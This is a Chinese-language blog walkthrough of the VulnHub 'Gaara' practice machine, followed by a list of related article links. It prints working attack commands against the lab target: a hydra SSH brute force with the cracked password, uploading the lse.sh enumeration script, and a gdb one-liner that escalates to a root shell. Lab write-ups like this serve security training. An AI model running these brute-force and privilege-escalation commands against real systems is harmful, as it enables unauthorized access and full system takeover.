vulnhub--Gaara

最新推荐文章于 2024-01-24 17:50:20 发布
最新推荐文章于 2024-01-24 17:50:20 发布
阅读量231 收藏 1
点赞数 1
分类专栏: vulnhub靶场 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45922278/article/details/115356304
版权

描述

你能成为新的风俗人吗?看看根标志!:)

这与VirtualBox而非VMware搭配使用效果更好

 

目录

一、信息收集

1.nmap端口扫描

2.目录扫描

二、漏洞探测&利用

1.hydra ssh服务爆破

2.登入ssh

三、提权

1.提权失败

2.提权漏洞检查 lse.sh

四、总结

一、信息收集

1.nmap端口扫描

nmap -sC -sV -p- 10.22.112.158   #-sC 根据端口识别服务自动调用默认脚本;-sV 扫描目标主机的端口和软件版本

 

2.目录扫描

 gobuster dir -u http://10.22.112.158/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,git,html

 

访问http://10.22.112.158//Temari也没什么有用的信息

都是关于Gaara 的介绍,猜测Gaara 是用户名。

 

二、漏洞探测&利用

1.hydra ssh服务爆破

hydra -l gaara -P /usr/share/wordlists/rockyou.txt 10.22.112.158 ssh

[22][ssh] host: 10.22.112.158   login: gaara   password: iloveyou2

 

2.登入ssh

 

得到第一个flag

 

三、提权

1.提权失败

L3Vzci9sb2NhbC9nYW1lcw==

 

解密: https://www.splitbrain.org/services/ook

 

被嘲讽了(-_-)

 

2.提权漏洞检查 lse.sh

1)本机开启http服务

python3 -m http.server 8001

 

2)被控端下载lse.sh

 

3)赋予权限,启动检查

 

 4)提权库搜索 gdb 提权

    https://gtfobins.github.io

 

5)提权命令

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

 

6)得到第二个flag

 

四、总结

 

New6ie
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub:GAARA:1靶机
logan_logan的博客
06-06 726
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 nmap -p- 192.168.31.144 nmap -sC -sV -p 22,80 192.168.31.144 3.目录枚举 扫描到一个Cryoserver目录,接下来在网页中打开 gobuster dir -u http://192.168.31.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 在浏览器中打开这个目录之后,在底部存在三个提示
Vulnhub--Gaara
从不专注的人的博客
06-16 417
目录Vulnhub--Gaara信息收集扫描目标网段扫描端口及服务版本目录扫描漏洞利用hydra破解ssh登陆进行提权查看文件 Vulnhub–Gaara 靶机下载地址:https://www.vulnhub.com/entry/gaara-1,629/ 信息收集 扫描目标网段 我们先使用nmap命令扫描网段 扫描端口及服务版本 然后我们访问80端口,没有发现什么有用的信息 目录扫描 然后我们来进行目录扫描 dir -u http://172.16.58.138/ -w /usr/share/dir
VulnHub-GAARA: 1
sanqin_的博客
07-11 211
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/gaara-1,629/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 可以看见开发了两个端口,22:ssh、80:http 访问网页无果,使用dirbuster扫描器扫网页扫出一个/Cryoserver 在尾巴找到三个提示,有用的只有/iamGaara 可以在该网页中找到一串密文 解码后
python -m http.server 迅速搭建本地任意目录http.server服务器
01-26 1万+
如果想把命令E:\zpic作为提供下载的目录,那么在cmd里cd到该目录下,并执行命令:python -m SimpleHTTPServer 默认的端口号是8000, 服务器根目录就是运行python命令的工作目录 如果提示错误: No module named SimpleHTTPServer 则试一下命令: python -m http.server 用http://127.0.0.1:8000即可访问目录下内容 或者加上端口号:python -m http.server 3002
python -m http.server在本地启动简单HTTP服务器的命令
NLP工程化
01-01 2803
python -m http.server 是一个用于在本地启动简单 HTTP 服务器的命令。这个命令会在当前工作目录启动一个基本的 HTTP 服务器,可以让你通过浏览器访问本地文件。
Bo-Blog Gaara
11-28
作为一个网页模版,Bo-Blog Gaara允许用户通过自定义布局、颜色方案以及功能模块来打造个性化的博客平台。 Bo-Blog Gaara的核心特点包括: 1. **易用性**:该系统对初学者友好,安装过程简单,只需几步即可完成。...
Gaara-Bot:一种高质量且独特的音乐机器人,可以在播放音乐时为您提供有关YouTube视频观看次数和上传日期的信息。 更多功能即将推出
02-16
加拉·波特(Gaara Bot) 高品质和独特的音乐机器人,可以在播放音乐时为您提供有关YouTube视频观看次数和上传日期的信息。 更多功能即将推出。 表中的内容 指令 m!help显示所有命令 m!invite 〜要将bot添加/邀请到...
配置好的FCKeditor-2.3.rar
05-26
FCKeditor是一款强大的开源在线文本编辑器,常用于网页内容的创建和编辑。它提供了类似桌面文字处理软件的界面,使得非技术用户也能方便地在网页上编辑文本、插入图片和多媒体内容。这款编辑器在2.3版本时已经相当...
SakuraGaaraBlog
05-25
通过分析项目的名称,我们可以推测博客的设计可能带有日式樱花或Gaara(《火影忍者》中的角色)的主题元素,这在视觉呈现上可能会有独特的风格。 HTML(HyperText Markup Language)是网页制作的基础语言,用于构建...
Strus2+Spring 4 +Hibernate 所需全部jar包
05-24
Struts2、Spring 4 和 Hibernate 是 Java Web 开发中常用的三大框架,它们各自负责不同的职责,协同工作可以构建出高效、可维护的后端应用。这个压缩包提供了这三个框架所需的全部jar包,确保了搭建项目的稳定性和...
【Python】快速创建一个简易 HTTP 服务器(http.server)
热门推荐
XavierJ的博客
04-16 7万+
引言 http.server 是 socketserver.TCPServer 的子类,它在 HTTP 套接字上创建和监听,并将请求分派给处理程序。本文是关于如何使用 Python 的 http.server 模块快速地搭建一个简易 HTTP 服务器的教程。 安装 Python3 内置标准模块,无需安装。(在之前的 Python2 版本名称是 SimpleHTTPServer) 教程 用命令行创建 http.server 支持以 Python 解释器的 -m 参数直接调用。 通过执行如下命令创建一个最.
Python中启动HTTP服务器的命令python -m http.server
HQC66666的博客
09-10 3286
是一个在Python中启动HTTP服务器的命令,它允许你在本地计算机上快速搭建一个HTTP服务器。
用python -m http.server搭一个简易的本地局域网
ma7986321的博客
06-12 6万+
使用 python -m http.server 搭建一个简易的本机局域网 工作时同事间几mb小文件的传输,一般使用QQ或者微信就足够了,但当传输文件几百MB或者几十G时,这种方法的效率就显得不足了。本篇就是简单说明一个python小功能,让大家能利用python方便的搭建一个本地局域网。跟同事测试时,速度轻松达到800mb/s。 搭建只需三步就可以: 1.设置python路径为环境...
linux提权辅助工具linux-smart-enumeration(三种工具)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 1141
今天讲linux提权辅助工具三种之一的linux-smart-enumeration。 linux-smart-enumeration工具介绍,这个项目的灵感来自 https://github.com/rebootuser/LinEnum 并使用了它的许多测试。与 LinEnum 不同,lse它试图从隐私的角度根据其重要性逐步公开信息。该 shell 脚本将显示有关本地 Linux 系统安全性的相关信息,有助于提升权限。 项目地址:https://github.com/diego-treitos/lin
软件测试|Python开启http server服务,轻松传输文件
百晓生说测试的博客
01-16 762
在我们的日常工作中,可能会需要在不同的设备中间传输文件,但是我们不是在任何地方都可以使用网络,或者有U盘等可以作为中转的存储介质,这个时候,我们就可以使用Python开启,这样我们就可以很快很方便地实现文件的共享,本文就给大家介绍一下使用Python开启的步骤。本文主要介绍了使用Python开启服务的步骤,这个便于我们在不同的设备间传输文件,并且速度非常快速,希望这个教程可以帮助到大家。
python:http.server --- HTTP 服务器
点点关注不迷路
03-11 3747
python:http.server --- HTTP 服务器
vulnhub--Chill Hack
weixin_45922278的博客
02-07 230
靶场描述 难度:容易/中级 标记:2(用户和root) 提示:枚举 目录 一、信息收集 1.nmap端口扫描: 2.dirsearch目录扫描: 二、漏洞探测 三、漏洞利用 四、提权 1.sudo -l 2.寻找其他漏洞: 1)hacker.php 2)steghide工具 3)ARCHPR 爆破密码 4)lse.sh Linux枚举工具 5)docker提权: 五、总结 一、信息收集 1.nmap端口扫描: nmap -sP 192.168.155.129/..
【跟着暴躁哥学 Python】 http.server:快速搭建你的本地服务器
最新发布
babybin的博客
01-24 1438
这样太简单了,我要自定义!” 没问题!来自定义一个:比如我们加上一个"/hello"路由。")else:super().do_GET() # 其他请求就用默认的处理方式再复杂点儿,需要加上简单的POST请求。import cgi")else:super().do_GET() # 其他请求就用默认的处理方式else:POST数据到/submit,服务器就会回你一条信息。
渗透学习之Vulnhub----Gaara:1
jjjjj34的博客
12-01 1287
攻击机:192.168.4.50靶场ip:192.168.4.139。
python -m http.server
stybill的博客
12-12 4万+
用python -m http.server搭一个简易的本地局域网

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值